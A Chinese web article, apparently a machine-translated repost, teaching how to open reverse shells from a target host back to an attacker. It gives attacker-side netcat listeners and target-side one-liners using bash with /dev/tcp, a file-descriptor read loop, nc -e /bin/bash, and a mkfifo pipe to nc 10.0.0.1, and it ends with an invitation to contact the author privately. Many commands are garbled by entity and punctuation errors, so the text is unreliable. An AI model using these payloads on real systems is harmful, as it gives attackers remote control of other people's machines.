首页> 新闻> 正文

服务器反弹shell,让你的电脑成为傀儡!!

2020-03-19      作者:[db:作者]

0x01.bash

在攻击主机上执行端口监视器:

nc -lvvp port //port是攻击主机端口号,并且该端口号未被占用


在目标主机上执行:

bash-I > & amp;/dev/tcp/攻击主机IP/端口0>。&1 //port解释攻击主机端口号

:

bash -i打开一个交互式bash


>。&将标准错误输出重定向到标准输出


/dev/TCP/x.x.x.x/port意味着调用套接字并建立套接字连接,其中x . x . x . x是要跳转到的主机ip,端口是端口


0>。&1标准输入被重定向到标准输出,以实现您与反弹外壳

/dev/tcp/的交互,这是Linux中的一个特殊设备。打开这个文件相当于发出一个套接字调用,建立一个套接字连接,读写这个文件相当于在这个套接字连接中传输数据同样,还有/dev/udp/


其他版本:


exec 5 & lt;>;/dev/TCP/x . x . x . x/9999


cat & lt。&5 |读取行时;做$line 2>。&5 >。&5 .Done


第一个命令与x.x.x:9999建立tcp连接,并将标准输入和输出作为标准输入和输出


第二个cat < & amp5获取设备5的输入;当读取行时;做$line 2>。&5 >。&5一旦获得命令,它将运行,然后将标准输入和输出以及标准误差输出到

< BR >

0x02。设备5中的数控(Netcat)回弹

。端口监视器在攻击主机上执行:

nc -lvvp port //port是攻击主机的端口号。并且此端口号未被占用


在目标主机上执行:

nc -e /bin/bash攻击主机ip端口


还可以执行

Nc x . x . x . x 1234 |/bin/bash | Nc x . x . x . x 4321//打开攻击主机上的两个终端并侦听端口1221在获得回弹壳之后,1234终端输入该命令,并且4321终端在执行相应的命令之后将获得结果


。因为netcat现在可能在许多主机上不可用。因此,如果您在nc -e /bin/bash攻击主机ip端口中遇到不支持-e选项的主机(尽管netcat存在),您也可以通过这种方式来退回shell

rm /tmp/f。MK FIFO/tmp/f;cat /tmp/f|/bin/sh -i 2>。&1|nc 10.0.0.1 1234 >。/tmp/f


RM/tmp/f删除命令

kffo/tmp/f;将fifo文件f

/bin/sh -i 2 >写入tmp目录。&1将标准误差/bin/sh重定向至标准输出

nc x.x.x.x 2333 > /tmp/f将nc监控的输入输入fifo


。你不知道你学到了什么吗?网络世界中的安全漏洞每天都在发生。每个公民都应该了解和学习安全知识和安全意识。任何想学习网络安全技能的小伙伴都可以随时私下信任我。